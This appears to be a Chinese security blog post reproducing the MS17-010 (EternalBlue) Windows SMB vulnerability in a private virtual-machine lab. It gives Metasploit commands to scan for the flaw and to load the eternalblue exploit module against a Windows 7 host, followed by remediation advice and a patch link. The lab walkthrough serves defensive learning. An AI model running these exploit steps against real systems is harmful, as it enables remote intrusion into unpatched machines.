• 欢迎访问本站网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

永恒之蓝MS17-010漏洞复现及处置建议

网络安全 admin 6个月前 (10-18) 143次浏览 已收录 0个评论 扫描二维码

MS17-010是在Microsoft Windows中的漏洞。 如果攻击者向目标主机服务器发送经特殊设计的消息,则可能会造成允许远程代码执行漏洞 ,编写此类文章的目的是为了介绍我们网络中的一些黑客攻击的方式和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!


本实验在虚拟机环境下进行
kali 172.20.10.6


Windows 7 172.20.10.5


永恒之蓝MS17-010漏洞复现及处置建议


nmap 172.20.10.5 永恒之蓝MS17-010漏洞复现及处置建议
验证是否存在漏洞

  1. search ms17_010
  2. use auxiliary/scanner/smb/smb_ms17_010
  3. set RHOSTS 172.20.10.5
  4. run

复制代码

永恒之蓝MS17-010漏洞复现及处置建议
利用

  1. use exploit/windows/smb/ms17_010_eternalblue
  2. set RHOSTS 172.20.10.5

复制代码

永恒之蓝MS17-010漏洞复现及处置建议
永恒之蓝MS17-010漏洞复现及处置建议

修复建议

开启防火墙
关闭445、135、137、138、139端口,
关闭网络共享

微软官方补丁: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN


免责声明与本站提供的代码或者工具从事任何有关违法犯罪行为或活动的仅由您自己承担。滥用本网站上的信息可能会导致,有关人员提起刑事诉讼。如果对滥用本工具中的信息以从事违法犯罪行为,被追究责任的后果自负,作者将不承担任何责任。

编写此类文章的目的是为了介绍我们网络中的一些黑客攻击方法和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!


本站的文章和资源来自互联网或者站长的原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:永恒之蓝MS17-010漏洞复现及处置建议
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址